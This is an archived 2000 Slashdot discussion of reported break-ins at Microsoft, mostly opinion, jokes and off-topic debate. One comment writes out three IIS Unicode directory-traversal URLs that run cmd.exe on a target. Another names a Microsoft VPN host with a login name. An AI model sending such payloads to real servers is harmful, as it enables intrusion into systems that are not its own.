Want to read Slashdot from your mobile device? Point it at m.slashdot.org and keep reading!


Forgot your password?

Microsoft Cracked again? 185

Dominic writes: "Seems microsoft have been hacked (possibly) again, acording to infoworld." They don't seem to have a lot of evidence, but there's some interesting commentary related to this, and the earlier crack where the source code to Windows and Office was supposedly stolen (I'll believe that when I see it).
This discussion has been archived. No new comments can be posted.

Microsoft Cracked again?

Comments Filter:
  • It seems that with these hacks Microsoft is losing more than their renound ability to market and spin themselves around. Usually their Marketing does all the work and the technical side of their product is kept to a whisper. But now with these hacks their Admins are admitting their faults and it seems the marketing is coming back to "clarify" things so we the public don't panic.

    Let me guess... A few days from now the story will be cleared up as a minor breach and that no data was modified nor seen...
  • Microsoft advertise thier products as being "secure solutitions". Assuming Microsoft use thier own products, this is clearly a hypocritical statement, perhaps misleading.
    They also seem to have a complete disregard for the security of their products, allowing them to be made availiable in this way.
    Perhaps Microsoft should actually think about the problems this caused for them, and the problems is could quite easily cause for others, the consequences are most severe.
    Buck up your attitude?
  • yer.. few years ago people would have just said "who'd put windoze boxen on the net?!!" and that would be that.
  • Microsoft is a huge target for criminals who like to test doors. One of the senior Microsoft security dudes at last year's SAGE-AU conference [sage-au.org.au] let us know that there are at least 10,000 port scans, and about 300 more complex attacks conducted against Microsoft every week. The team is made up of about 10-20 people, and they have to provide 24x7 coverage. The triage each attack and deal with those that actually form a real threat to the organisation. They also conduct internal tiger team attacks to ensure they know about the holes before attackers do. Considering they have over 30,000 desktops and associated servers, this is a difficult and immense task. Very few non-finance companies take security this seriously.

    They are probably "cracked" on a regular basis, but because you don't hear about it, and so it remains a non-issue. As soon as a little event ends up in the news, this sort of silliness is the result. Hopefully, you'll understand why most companies, including banks, are extremely reluctant to share information with the law enforcement agencies. One simple little attack might take a company's value through the floor because investors don't understand the hoopla surrounding a security incident. You hear about bank holdups all the time, but you'll never hear about real incidents of electronic fraud or Internet banking attacks, even though they occur every day somewhere on the planet.

    There are many companies that take a similar risk-managed approach to security. You classify assets based upon their worth to the organisation, and then you protect them to that value. Cracking into the machines that do "download.microsoft.com" is different to cracking into the corporate ERP system or the internal code repositories.

    With over 10,000 attacks a week, Microsoft takes a reasonable approach to security, in my opinion. No one can be 100% secure, and it costs so much to be near 100% secure that it's not worth doing so. If you don't agree with me, bite me. Unlike most of you, risk managed security architecture is what I do for a living.

  • The news agencies are probably not reporting it because they use Microsoft Windows and can't make themselves look bad to the public.
  • Since absolutely none of us know gates in real life (what do we all know of him? his company? his software? that shoddy movie "The Pirates of Silicon Valley"?), I have to agree with you. Yes, he's the world's richest man, and it would appear that he actually has some common sense and a conscious (s?).

    Too often on here I see the ignoramus posting about the evils of microsoft and Gates. I think its the same thing as penis envy...he's rich, he's got an amazingly successful company..and you dont. I'm no fan of the software quality myself, but I wont go about spouting how the CEO is evil. Thats just immature. I think Gates has proven himself a worthy human with all his donations. At least he's doing more than those other tech people who claim that computers can solve everything. You need to be able to eat decent food and clean water before you need a SystemTech PentiumProThlon 9000 w/ advanced graphics capabilities and altec lansing speakers. You need to solve starvation before planting a laptop in the hands of the poor.

  • It's hard to be a wealthy nation when all of your resources are being exported for dirt cheap and all your labor is being employed by foreigners.

    Well, by that standard then, nations like Cuba and Iraq ought to be paradises. The embargos keep us vicious foreign devils from looting them. So, why are they miserable pits of desperation and poverty?

    As for rule of law, that's very vague. If you mean the laws that allow only US-owned businesses to import and export food while depriving native farmers of implements and supplies, then I'd have to say you're wrong. If you mean establishing a minimum standard of living for the populace, I'd say you're right.

    No, I mean that you pass laws that permit people to keep the fruits of their labors and assure certain basic rights such as speech, assembly, voting, etc. and you make sure that you have a legal system that enforces those laws. Without corruption or cronyism.

    Your response betrays your mindset that for a nation to succeed, it must obtain the means to do so from outside. I maintain that that simply isn't true. The reason the West prospers is a result of its freedoms, laws, and capitalism. For a good example of what happens when you lose that, you need look no farther than South Africa. Once the economic jewel of the continent, it's gradually descending into a chaos of tribalism and corruption. Unchecked, it will ultimately be as impoverished as its neighbors.

  • I know, I just wonder how it could happen twice so close to each other, one should think that they would have a lot of attention on the subject after the first time.
    Of course if it was years ago, then most people would lower their guards and relax a bit because they needed a "wake-up-call".
    And it cant be easy to be a favorite hacking object.

  • > I haxored kernel.org and downloaded the linux source code

    That's nothing. I downloaded it, changed some things, and uploaded the changes!

    I even put my name in the files, so anyone else who downloads it will know I did it!

  • This is utter corporate fluff.

    "...The[y] triage each attack and deal with those that actually form a real threat to the organisation..."

    Even the most self-serving accounts of the previous crack says that the crackers were in for twelve days. M$ spun the story to say that they were watching the whole time; I don't believe that. Now *you* want us to believe that M$'s response team really focuses on attacks "...that actually form a real threat to the organization..."

    Nuts. They flat didn't even know the first one was happening for 'way too long.

    "...They also conduct internal tiger team attacks to ensure they know about the holes before attackers do..."

    That's all real fine-and-dandy for the hard-core threats -- but every account I've read says that M$ was compromised by an email attachment that:

    1) got into M$'s system in the first place

    2) was executable because M$'s own software design defaults to firing-off an email attachment by merely double-clicking on it..

    3) and finally, the M$ employee who did that hadn't even received the *most rudementary* training in protecting him/herself from such a brain-dead simple compromise

    "Tiger teams"?

    "Tiger teams" aren't going to do M$ any good; it's their own software and their own arrogance that did them in.

    To let you continue:

    "...Hopefully, you'll understand why most companies, including banks, are extremely reluctant to share information with the law enforcement agencies..."

    No, I don't, particularily given your outlandish rationalization:

    "...One simple little attack might take a company's value through the floor because investors don't understand the hoopla surrounding a security incident..."

    "One simple little attack..."?


    That's what any shareholder concern boils down to? God forbid that a company's shares fall in price because they can't manage to implement a comprehensive security system.

    And let's not worry the silly little investors about such trivia.

    "Hey! They invested in our company. How smart can they be?"

    I think not; therefore I ain't®

  • Your subject title is actually a very good answer to your question. Microsofts security system is not entirely Windows based - if you recall an aticle entitled `Unix at the Empire' a few months ago, or talk to those who have knowledge of MS internal security, there is a lot of ipfilter based OpenBSD firewalls.

    Though, as Microsoft are often in the habit of eating their own dog food, they might beusing their new Internet Security and Acceleration [ISA} Server, the replacement to shitty old proxy server. This eliminates much of the nastiness [and non-firewallness] of PS, and is about -3 months old. This incident would damage the launch severely is MS told anyone what they were using.

    I'd suspect, with regards to security, they do the testing in a closed environment for quite some time.

    But your point is nevertheless a good one - while we don't know what MS use internally, the habit of people calling Outlook Viruses `email viruses', when they only affect a specific client, is misleading.
  • Who cares? Prove it isn't a simple tax writeoff. I don't buy that the guy is Mother Teresa, or even has the interests of others at heart. Even in this he's out for himself- if nothing else, the amount of goodwill he got from _you_ was worth every penny- and in relation to his total wealth it _was_ the equivalent of a penny to most people.

    Sorry- having an open mind is great so long as your brain doesn't fall out. I think you've been spun. The guy's still the primary personality behind the totally unacceptable behavior of Microsoft, which has been _convicted_ of monopolistic crimes, the list of which is so long it'll make your head spin. Did they just do this at random? No, there was a pattern of 'search and destroy' and open attack of the capitalistic process coming right from the top there.

    If tossing a few nickels at charity can really make you forget that, you have a _short_ memory.

  • sure they could. i mean, people can sue other people (and win) for having a *tree* in their own garden that's "blocking [their] view", so why not something as serious as security?
  • breaking news! microsoft hires monty python to write the killer joke and embed it in the source code. avoid at all costs, it WILL kill you!
  • by paai ( 162289 ) on Sunday November 05, 2000 @09:52AM (#647589) Homepage
    What I do not understand is why so many people try to crack Microsoft itself. Yes, sure, you wave your manhood for everybody to admire its size, but...
    ... in the meantime you help actively to make the Microsoft-site the best-protected site in the world. Do you want that?
    So mess with the customers of Microsoft as much as you want, embarass them for the whole world, but leave Microsoft itself alone! There may come a time when it is desperately necessary to break into the Microsoft stronghold and *then* you want all those exploits wide open; not plugged.
  • a boy wanting to show off to his girlfriend:
    b: look at my machine
    g: wow, so much cables and so...
    b: i am a superhacker. i already hacked pentagon and nearly sent nukes on russians
    g: cool really? can you show something to me?
    b: sure look now i login to internet
    aolsoft: you've got mail
    [click click] [ftp://billg:linuxsuxx@microsoft.com]
    [rm -r $HOME]
    b: now i hacked microsoft!
    g: wow, you are my hero *kiss*
  • The idea that you need source code to find BO's if fucking stupid, and shows how little you know about being l33t.

    I know that you don't need the source code to find buffer overflows. I also know that of 1000 people who can find a buffer overflow by examining the source code, maybe 2 or 3 know how to use SoftICE or IDA to find the same exploit by working on the binary. So basically, although you are correct in that you don't need the source code, it makes it much more difficult for the average script kiddie to find it, and thus less likely that it will become public knowledge.

  • Even an accountant who has 6 terminals open into an IBM mainframe knows that it's Lopht, not Loft.

    Smells terribly fishy to me.

    "I don't want the cheese; I only want out of the trap."
  • by pirodude ( 54707 ) on Sunday November 05, 2000 @09:54AM (#647593)
    Most sites are cracked by exploting a script (perl, c, php) that resides on the server. And sometimes there is just human error, like forgetting to change a default password (*cough* slashdot *cough*)

  • Read this:
    http://www.observer.co.uk/international/story/0,69 03,393015,00.html [observer.co.uk]

    This single article reversed 180 degrees my opinion of Mr. Gates.
    I previously believed him to be a greedy, naieve, power-hungry egomaniac. If this article is accurate, and he will be giving away his money for food and medicine instead of for computers (which are pretty useless if you don't have anything to eat) then maybe slashdot should look into not portraying his as such an evil person. Maybe he has finally matured?

    (I know this goes completely against the conventional wisdom on Slashdot, but read the article, maybe submit it as a story here... show that even geeks can be open-minded)

    Open Source, Closed Minds. We are Slashdot.
  • by kodiar ( 226287 ) on Sunday November 05, 2000 @09:58AM (#647595)
    From a local paper: [jsonline.com]
    A ... network security consultant and expert on hackers, said that if a copy of the code was downloaded, the person who seized it may demand a ransom for its safe return. Or if the attacker was an "open-source vigilante," the hacker might release it on the Internet for everyone to enjoy. "They believe information wants to be free," he said. "And that Microsoft is the big, evil empire."
  • Then after, MS will say that the Open Office's source have the stolen MS Office source code and they will condamn anything that OpenSource is made from stolen source code and all the crap they normally say.
    Office source code was stolen? Yeah, sure!
  • That's funny, dammit!

    The moderator who modded the above post as "Troll" must be whacked with a cluestick, please!

    Quidquid latine dictum sit, altum viditur.
  • Teaching kids to code would cost money? Maybe if you are getting some phat ass wages at the moment and you would have to take time off to do it but I don't see why coder's can't donate some of their time to teach disadvantaged kids how to code. Sure, you'd have to fork em a pc or two, but it's a small donation and you'd probably take a cut of the contract work you get them.. oh wait.. there's that exploiting the third world thing again.. drat.
  • Have no fear: Billg is still the ``greedy, naive power-hungry egomaniac" we all know & love. And he's got a ring of folks around him who will do theri utmost to keep him that way. They check his computer daily to make sure he'll never see a BSOD, & assure him that he is the genius he thinks he is.

    After all, if he realized just how bad things truly were, & how much he could have done to prevent those bad things, he'd also see that they were nothing more than a band of toadies & parasites, & be out on the street without stock options or job prospects.

    I just had a flashback to the old stories of Siddharta Gautama, who was shielded from death and decay by his royal advisors and parents. Once day upon seeing a sick man, a crippled man, a dead man, and a religious man, he realized how the world really was, and fled to live a religious life.

    Wow, I just compared Bill Gates to Buddha. I suddenly feel the need to go wash.

  • anyone with their heads on the outside of their ass has backups stuffed away somewhere physically separate from the servers, preferably on 2 or more locations.
  • by cfish ( 61161 )
    This is a hoax. The reason behind it was that Bill Gates watched "Charlie's Angel" yesterday...

    Bill went home and started calling every Charlie on the phone book to hire angels.
  • From Bill Gates' letter:

    The feedback we have gotten from the millions of people who say they are using LINUX has all been positive. Two surprising things are apparent, however, 1) Most of these "users" never bought LINUX (less than 10% of all PC owners have bought LINUX), and 2) The amount of royalties we have received from sales to hobbyists makes the time spent on LINUX worth less than $2 an hour.

    Why is this? As the majority of linux users must be aware, most of you steal your software. Hardware must be paid for, but software is something to share. Who cares if the people who worked on it get paid?

    Is this fair? One thing you don't do by stealing software is get back at Linus or Alan for some problem you may have had. RedHat doesn't make money selling software. The royalty paid to us, the manual, the tape and the overhead make it a break-even operation. One thing you do do is prevent good software from being written. Who can afford to do professional work for nothing? What hobbyist can put 3-man years into programming, finding all bugs, documenting his product and distribute for free? The fact is, no one besides us has invested a lot of money in hobby software. We have written Emacs, and are writing kernel 2.4, but there is very little incentive to make this software available to hobbyists. Most directly, the thing you do is theft.
  • If the events of the passed couple of weeks are any indication, I wouldn't worry too much. It doesn't seem like Microsloth is paying much attention to their security. People can probably keep (cr|h)acking them for quite some time without them responding. It could be a fun game.
  • and what are you doing?
  • (red herring: l0pht is incorrectly spelled "l0ft" in the article)

    Shouldn't l0phtcrack be just as "illegal" regarding Microsoft SAM encrypted password files as DeCSS is to DVDs?
  • With Nvidia "leaking" driver rev's so frequently maybe MS was hoping that one of these internal alpha/beta/final builds would solve everybody's problems. Maybe make windows run better then they would sieze on that and start putting that version of the code out as final :)


  • by Lostman ( 172654 ) on Sunday November 05, 2000 @09:30AM (#647607)
    "It's hard to give you an absolute certainty that the patch had been applied across the board. Given today's incident, our security teams are going back to check out the systems."

    This statement is particularly disheartening. When the problems with Microsoft Outlook Express and the "features" that allow virus's to spread have their only fix with these Patches, and that -- according to even Microsoft -- its hard to make sure that the patches our applied completely: we should worry.

    One might say that the little Microsoft Accessories should have been coded correctly the first time (before being published) but that is often a very hard thing to do.

    I am asking You All: What ways could we make sure that "patches" had been applied across the board?

  • thank you for proving that not EVERYBODY on here are zealots.
  • We know that no web server is immune to being cracked. Not because it's a Microsoft web server that it should be immune. They're using the same software as the other big web sites that have been cracked.
  • Christ's fat cock, neuneu.

    It was supposed to be funny.

  • Color me paranoid but I think microsoft is up
    to no good....Hacked twice in a couple of weeks?
  • Well, can't we just hack microsoft like this guys, and filter all code thru "c2pas" and have a GPL'd office filters in PASCAL!

    One can easily see that this code no longer belongs to microsoft since it's "rewritten from stratch"!

  • by Bad_CRC ( 137146 ) on Sunday November 05, 2000 @10:02AM (#647613)
    so Microsoft can claim any bugs were maliciously inserted by evil linux hackers who cracked into the network.


  • Funny. This article (about Bill Gates having a conscience) rather alarmed me even more. If mighty men suddenly develop a conscience, they may well go and try to better the world. This generally leads to greater evils than the ones they wanted to combat...
  • you mean L0pht, right? That's a zero, not an `o'.

  • Actually, its l0pht. Well, actually it's @Stake now. Or @Steak, if you want.

  • Safe return?

    What would he do, upload back to the MS ftp server? Maybe burn it to a disk and mail it to them?

  • *shrug*

    It's an improvement, at least. And he's right -- a lot of people would be helped more by basics like immunizations than, oh, Pocket PCs or e-mail.

    The NYT almanac puts the life expectancy for those born in '94 in Rwanda at 23; Sierra Leone and Mozambique at 34; Liberia at 39, and so forth. These people have more immediate concerns, like war, famine, pestilence and plague, that should take precedence over hypertext. Funding something like immunizations (which his Foundation does), or, say, GM grains engineered for high yield (dunno if it does), would help a bit more...
  • I am asking You All: What ways could we make sure that "patches" had been applied across the board?

    Tivoli for Linux (yes, it exists The Red Hat Update Agent (up2date) (when it works). [tivoli.com]

    A clueful admin.

    A clueful CIO.

  • Well, they were dumb enough to get hacked twice in the first place. They probably have their backup, on tape or cd somewhere in a fireproof safe in their building| like i do. I usually keep my server's backup in my basement, so if disaster hits, Ill get a jackhammer, and get to my backup on DVD disk. :)

    ETRN x
  • They switched to Solaris as a consequence of being cracked.
  • OT and all but don't use wu-ftpd, if they have problems(not really an if) use ProFTPd or something else.

  • I would still like to see a Boland compiler, being able to download a newer RealPlayer for Linux and being able to feel save of Peter Norotn's Apps. It's not just about being able to see Director in Linux... Flash would be nice. =)
  • GM grains engineered for high yield (dunno if it does)
    we already destory more food than we can eat
    food prices are kept artificially high to "stablize economies"
    GM crops lock farmers into buy seed grain rather than growing their own and also lock them into pesticide / herbicide models
    thus raping Africa once more
  • <TROLL>
    If you h4x0r3d it, could you please post the 2.4 source code?
    We've been waiting for it for soooo long...

  • And now they will release "Windows RT 2000 Secure Edition"

    RT - Russian Technology

  • Certainly the "Safe return" thing is funny. There's no way they could guarantee the code was deleted or anything.

    But the second bit... well, that's the attitude I sometimes see reading slashdot. I can see how it would be easy for media "outsiders" to make that assumption.
  • Microsoft reserves the right to terminate any user

    Now that's scary. I won't object termination of the license agreement, but sending death-squad to the user who peeked into M$ code seems to me a bit like over-reaction...
  • Let me guess... A few days from now the story will be cleared up as a minor breach and that no data was modified nor seen...

    already happened [infoworld.com].

  • > even though the patches are developed and tested in the same building

    .. You forgot to mention the bugs, which are also developed in the same building...

  • I am asking You All: What ways could we make sure that "patches" had been applied across the board?

    You could always add them to the payload of an email virus ;)

  • by ryanr ( 30917 ) <ryan@thievco.com> on Sunday November 05, 2000 @12:58PM (#647632) Homepage Journal
    I was given a copy of a small log that Dimitri shared with the IDG reporter. Egg.microsoft.com was not one of the servers mentioned.

    And yes, the exploit was nearly identical to one of the lines you mentioned above.

    (The IDG reporter said I couldn't share the log, sorry. Though it's possible that restriction might be gone now that the story has been published. The Infoworld story is a reprint of the IDG story that broke on Friday. Strangely enough, I didn't actually say the first sentence attributed to me in the article.)
  • by Lion-O ( 81320 )
    I've seen this so called hacker on a Dutch television show and he's more then pathetic. When security and such were a bit more popular he got invited to a television show in which he would show how easy it was to hack a website. The site being targeted was www.voetbal.nl [voetbal.nl]. Like I said it was more then pathetic; he claimed that he hacked it (during a commercial break) and when he wanted to show it it wasn't able to anymore. "They changed the password", he said. Yeah right; at 22:00 on a sunday someone is still working and immediatly changed the password in, say, 5 min. No, this is just your regular hacker wannabe who will try anything to "ride a wave" in order to get his name mentioned. Rememeber; "it doesn't matter how you talk about them as long as you are talking about them".
  • If the exploit is sufficienly high priority (and -- not to dig at Microsoft -- most Microsoft patches are high priority because of the length of time they take to release them and the likelihood that a real-world exploit already exists for them) there is only one way to be sure. Shut down access to everything that doesn't have it yet, and only bring it back online when it does.
  • Why is security such a complex problem? It seems like as long as one designs everything with the intention of specifically allowing certain activities (as opposed to specifically disallowing certain activities), then the only risks are human (i.e. having a password stolen, and so on).

    Is it basically because not enough people design software to be secure? Or because people tend to add new features without considering the security ramifications?

    Still, I don't see why being hacked is inevitable; at some point, software can be designed so that circumvention involves breaking underlying assumptions which must be true in order for your system to run at all. i.e. any crack would instantly disable your system, leaving it secure.

    As a sysadmin, you can't know every single line of every program that's on your system, but isn't this the point of OpenSource: that some people will be intelligent enough to design secure software, and that others can fix what little glitches they miss?

    You seem too pessimistic.

  • by Cid Highwind ( 9258 ) on Sunday November 05, 2000 @10:23AM (#647636) Homepage
    ...source code to Windows and Office was supposedly stolen (I'll believe that when I see it)

    Unfortunately, persuant to subparagraph J of section 3, chapter 13 of the Microsoft end-user license agreement (EULA), Microsoft reserves the right to terminate any user who comes in contact with the Windows source code.

    If you do recieve the code via email or any other means, you are required to unplug your computer, telephone, and television, close your eyes, cover your ears, and chant "la la la, I can't hear you". Failure to comply with these provisions that protect our intellectual property is a violation of the DMCA, and will result in the MS Death-Commando(tm) being dispatched to your location.

    We reserve the right to take legal action against anyone who has seen the aforementioned code, anyone who assisted in the theft of the code, anyone who made funny remarks about our IP protection measures, and anyone who found said illegal statements humourous. Stop lauging, we mean it
  • With security through obscurity (which is what you are using) security holes are only patched after they have been cracked, i.e. someone has gotten screwed because of it. With real security, where many people check the source code for holes because they're relying on the security (not trying to exploit it), holes are also patched when the 'good guys' find a hole.

    If you want to wait until someone gets cracked before a hole is patched in your security, go ahread - I'll use open source, thanks.
  • by xinit ( 6477 ) <(rmurray) (at) (foo.ca)> on Sunday November 05, 2000 @10:24AM (#647638) Homepage
    How's this for a conspiracy theory;

    Monday November 27, 9:00 am Eastern Time

    Press Release

    Microsoft Eliminates Security Problems related to Linux 'Hacker OS'

    Redmond, Wa--(BUSINESS WIRE)--Nov. 27, 2000--Microsoft Corp. (Nasdaq NMS: MSFT) today announced that it has discovered the reasons behind the recent web breakins that have plagued them, and since eliminated them.

    "We have been working for the past month performing an audit of all of our systems that could have been the source of the leak. We found that one of our corporate file servers had been replaced with one of those Linux boxes running Samba. Someone in our intranet development team thought that it would be a good way to keep his budget in line. Well, he knows better now, introducing an insecure free 'operating system' like that in our network - it's a career limiting move." stated Phil Todd, PR spokesperson for Microsoft.

    Phil goes on to describe how a malicious hacker was able to remotely cause the source code in the Linux Computer to send him the Confidential Windows Source Code (tm). Linux 'Kernel Hackers' as they call themselves often do this kind of modification in order to make corporate firewalls useless. "You just never know what is in those free systems. There's nobody you can sue if things go wrong!" Phil added incredulously.

    Microsoft has since removed the offensive machine and replaced it with a Real Windows 2000 File Server. "Sure, some people say it's slower this way, but they're just misinformed. At least it's SECURE."

    About Microsoft

    Founded in 1975, Microsoft (Nasdaq ``MSFT'') is the worldwide leader in software for personal computers and business computing. The company offers a wide range of products and services designed to empower people through great software -- any time, any place and on any device. Microsoft is a registered trademark of Microsoft Corp. in the United States and/or other countries. Other product and company names herein may be trademarks of their respective owners.

  • What won't help the Third World is overpriced, overly complex software like Windows, the glitzy and wasteful Web standards Microsoft has been promoting, and the enormously expensive hardware needed to run it all.

    But computers could be very useful helping the Third World solve its problems: computers can take much better advantage of limited bandwidth, they are better suited to store-and-forward or intermittent communications, and they can greatly simplify administrative processes and reduce costs. In health care and ecology alone, being able to track diseases and other events reliably is very important.

    Of course, for that to work, you need low end, low-cost, reliable, and simple computers, open and stable standards, and free software. Third world countries can gain tremendously from computers, but they won't be able to do so if they spend money as wastefully on frills and upgrades as US corporations seem to be all too willing to do.

  • As long as humans are designing software, it's going to reach a complexity where not all use-cases can be considered. Therefore, there is the highest chance that some flaw will creep in. And then, since the number of people trying to discover that flaw in order to abuse it is always going to exceed the number of people looking for flaws to fix, the situation will continue. We've had say, 20 years of cracking - no reason to assume it's going to stop now.

    --Remove SPAM from my address to mail me
  • I realize that this is somewhat inflammatory, but I feel like it should be asked. I am not a programmer, and have the utmost respect for anyone who is capable of writing something like wine, but: Is that really a loss to the Free Software community? Is there any real use for wine except to run proprietary software under Linux? Does this not further our addiction to proprietary software (most notably that heinosity known as "Office") by reducing the imperative to create Free alternatives? Does this not endanger Free alternatives by extending the marketshare of proprietary applications (in that, Office users can now legitimately carp to Linux users that all work should be done in Office since it runs on wine)?
  • I am being serious here, but at the same time, I know that I am being paranoid.

    Microsoft has ties with several people in the government. Good ties. Friendships, so to speak. All of these recent hacker attempts seem a little fishy to me. Why all of the publicity, all of a sudden? Why the big stink?

    The USA government wants to pass even more restrictive internet and computer laws... laws which will be passed in the name of security, yet at the same time, killing our necessary personal freedoms - our rights.

    Bush and Bill are buddy buddy. Microsoft will hold out on seeing the Supreme Court until Bush has become prez and has appointed new Justices. Microsoft will get a slap on the wrist. Our government will then apply god awful amounts of regulation to the computer industry...

    So, yes I am being paranoid, but it all seems so obvious to me. Lets just hope that I am wrong, and next year, I am NOT saying "I told you so."
  • Is that supposed to be sarcastic?

    Try reading my .sig ya clam
  • While all you say may be true, some guy going by Dimitri did hack a couple of MS servers using the Unicode hole. Not a terribly impressive hack, but he tracked down a couple of MS servers that were vulnerable, and placed a couple of files.
  • When they were "cracked" last week, the stock rose a few bucks. Of course they go cracked again!
  • What is a very good way for M$ to stop wine, or at least discourage people from working on it? Create a situation where they can feasibly claim that code in it just might be stolen or that the people who wrote it had access to Windows source code. Whether they did or not is irrelevant, the fact that you can cause legal problems for them simply based on the idea that they might have is what matters. If I were a ruthless organization bent on world domination (like microsoft or $cientology), this is exactly what I would do.

    Expect to see legal roadblocks in the future for wine.


  • As I understand it, UCITA allows software companies to remotely disable software (almost) at will. If companies go for this (well they got the law passed for a reason), this could mean that hacking into a company such as M$ would give access to the programs / codes / whatever to shut down any of that company's software on any customer's site (assuming they're connected to the net).

    Now that would be scary.

    I bet the politicians behind UCITA didn't think of that.
  • by xee ( 128376 ) on Sunday November 05, 2000 @10:40AM (#647665) Journal
    Notice how no news agency that has reported the recent cracks has equated the security flaws in Microsoft's network and servers to Microsft's Windows operating system. No news agency is suggesting that "if you use windows, you could be next", as they often do with other reports. "Man dead after drinking poisoned orange juice... Find out if your orange juice could be poisoned - tonight at 10." Why is it that the news media is not running their usual tricks to scare the populus. In my (not ever humble) opinion, everyone running Windows is running the risk of their network/servers being cracked.

  • by Anonymous Coward

    Microsoft's internal network is made up of many seperate domains (and Active Directory forests). The Houston domain used exclusively for Microsoft's online properties (MSN.com, Microsoft.com, etc...) and has no privledges to Microsoft's primary domain, REDMOND.

    BTW: You can PPTP into Microsoft at cxn-redmond.microsoft.com. (However, they took it down recently because of these security problems.) Username: REDMOND\billg; Password: ????

  • > I previously believed him to be a greedy, naieve, power-hungry egomaniac. If this article is accurate, and he will be giving away
    > his money for food and medicine instead of for computers (which are pretty useless if you don't have anything to eat) then maybe
    > slashdot should look into not portraying his as such an evil person. Maybe he has finally matured?

    For the last souple of years (perhaps under the influence of this wife Malinda, perhaps not), Gates has been throwing money at various philanthropic targets. We're talking serious stuff like money to help homeless youth in the US Northwest, or to fund school programs in low-income school districts.

    Does this mean he has gained a conscience? No, he's always demonstrated signs that his political views are left of center; it's something of a hold-over form growing in up in Seattle. I'd say his own political views are best described as a ``limousine liberal." He is eager to throw money as ``good" causes, but has never thought about how much money he made by causing problems that need to be addressed by those ``good" causes. He is eager to give millions to provide drugs for Africa, but does not understand that Africa does not have the money to buy computer software at $50-- a pop. (MS Office being extra.)

    Have no fear: Billg is still the ``greedy, naive power-hungry egomaniac" we all know & love. And he's got a ring of folks around him who will do theri utmost to keep him that way. They check his computer daily to make sure he'll never see a BSOD, & assure him that he is the genius he thinks he is.

    After all, if he realized just how bad things truly were, & how much he could have done to prevent those bad things, he'd also see that they were nothing more than a band of toadies & parasites, & be out on the street without stock options or job prospects.

  • by zelyan ( 222028 ) on Sunday November 05, 2000 @11:22AM (#647673)
    And in other news today, a politician lied, astronomers discovered an asteroid that has a 1000-to-1 chance of hitting Earth, and the Napster suit is still ongoing. Industry experts expect that the stock market will continue existing and the dot-coms "might go up, might go down, nobody really knows why they do anything, anyway" said one macro economist.

    President Clinton could not be reached for comment, but Governor and Presidential candidate George W. Bush said "that's the way the cookie jar crumbles." No, we don't know what he was talking about either.


  • He doesn't want to believe he threw his money away on garbage.

    MS has no incentive in the marketplace to improve their software. Maybe bringing it home to them, by showing them how bad their security is, will force them to make a better product. I doubt it though.

    I worked in a bike shop for a few years. One man kept bringing in his bike to repair flats. He had about ten patches on his tires. It would have been cheaper to buy a heavy-duty inner tube and thorn scrapers, than to have it repaired over and over again, but he kept that leaky old inner tube.
  • Free software is limited by one important issue, who is going to do the coding and who is going to use the product coded? The vast majority of free software is created by people because they use it themselves. But there are also other areas where the people who have the talent to write the code have no interest in using the end product. Here proprietary solutions will continue to dominate.

    I don't know about you, but I really don't care whether my word processor is freeware or commercial. I want the underlying operating system to be free, or at least have all its specs published in full. Linux is great not so much because it is free of charge, but because there aren't any secrets about it. With windows there are lots of secrets. With the MacOS there are even more. But with Linux everything is right there on the table and its got a complete development environment included to boot! Talk about a hackers (!cracker) dream come true!

    In short, the open source/free software model is one that works in some areas. It does not work for all. Therefore it is not going to take over the world. Twenty years from now commercial software will be just as prevalent as it is right now, if not more prevalent. There is every chance that free software might not be successful in the long run. There is also every chance that it will be successful. But there is nearly zero chance that it will overtake every other development model.

    I personally think wine is the greatest thing since Linux itself. Imagine a terminal server type system based off wine? M$'s own terminal server is severly limited by the poor multi-user performance of NT. Unlike Linux and virtually any other version of Unix, it is very easy for a single user to eat up all the resources and lock out everyone else. This is a serious problem, but one that wine does not share. It wouldn't be too hard to make wine into one kick ass terminal server /citrix metaframe style system.

    I'm looking forward to bigger and better things from wine.


  • They did not actually switch to Solaris - they use NT for the front-end servers off an Oracle back-end database running a Sun Solaris server.

    The reason is that they find it easier to do rapid application development on the Windows machines. So in theory they can keep their back-end solid via Unix while having the development tools on an easily mastered platform.

    Personally, I think running the whole thing on Solaris would have been easier, but that is/was their rationale.


  • Same company, though. It's surely the Microsoft philosophy as a whole that makes their servers vunerable.

  • I think its incredibly naive of you to even suggest that computers are the solution to the problems of the third world. Sure they may play a minor role in helping third world countries manage limited resources, but putting them in class rooms? Your talking about the affordability of software when these people don't have the basic necessities of life?

    Turn off your computer, go outside, take a long pleasent walk, contemplate, and don't log back in till you realise there is more to the world then 1's and 0's.

    Third world countries need food, water, shelter and peace NOT computers. Regardless, this is getting way off topic, would really like to see that article posted in it's own thread. Would be interesting to see if the /. crowd is as open minded as it thinks it is.

  • by flikx ( 191915 ) on Sunday November 05, 2000 @10:47AM (#647694) Homepage Journal
    MS server software is, out of the box, full of security holes and downright dangerous to put on the Net without extensively patching them first, and

    In the past, I had to keep up on patching default Mandrake Linux 7.0 installs just to make sure that I didn't get owned by a wu-ftpd site-exec kiddie. Installing any OS requires keeping on top of things when you admin a server(s)... Micro$~1 makes sure that you have more to do to keep your servers "secure"

    First thing I do after installing any Os is find any security info I can and apply the related fixes.

  • Talk is cheap, and one of the world's richest men is merely talking.
  • Reembmer, just a couple of weeks ago when there was a story posted informing us slashdot was hacked and we all needed to come p with new passwords?

    Besides that, the highest profile linux sites aren't anywhere near as popular or hated as microsofts sites. IF linux made more enemies, i'm sure we'd see more concerted eforts to break it. Of course we'd get patches within hours days or weeks of each exploit. But the point is, because microsoft is almost so universally disliked by hackers, they go out of their way breaking microsofts products, rather than expend that same effort on free software.
  • Unfortunately, the actual EULA for Windows 98 doesn't say anything about source code. However, it does say this:

    * Termination.
    Without prejudice to any other rights, Microsoft may terminate this EULA if you fail to comply with the terms and conditions of this EULA. In such event, you must destroy all copies of the SOFTWARE PRODUCT and all of its component parts.

    Sounds fun. [aol.com]

  • by Anonymous Coward
    This real impact here is what this does to MS as a service vendor. At a time when system software is quickly joining hardware in the "commodity" category, services are becoming ever more important to companies as a revenue source. If MS can't even secure their own servers, how can they possibly claim to be able to do so for clients?
  • by x-empt ( 127761 ) on Sunday November 05, 2000 @09:34AM (#647706) Homepage
    I am willing to bet this "hacker" owned egg.microsoft.com, which was not patched. It took them a few days to take it down and it still is offline.

    He was not a "hacker" he just created one of the unicode urls that got parsed incorrectly by IIS. No skill.

    http://target/scripts/..%c1%1c../winnt/system32/ cmd.exe?/c+dir
    http://target/scripts/..%c0%9v../winnt/system32/ cmd.exe?/c+dir
    http://target/scripts/..%c0%af../winnt/system32/ cmd.exe?/c+dir
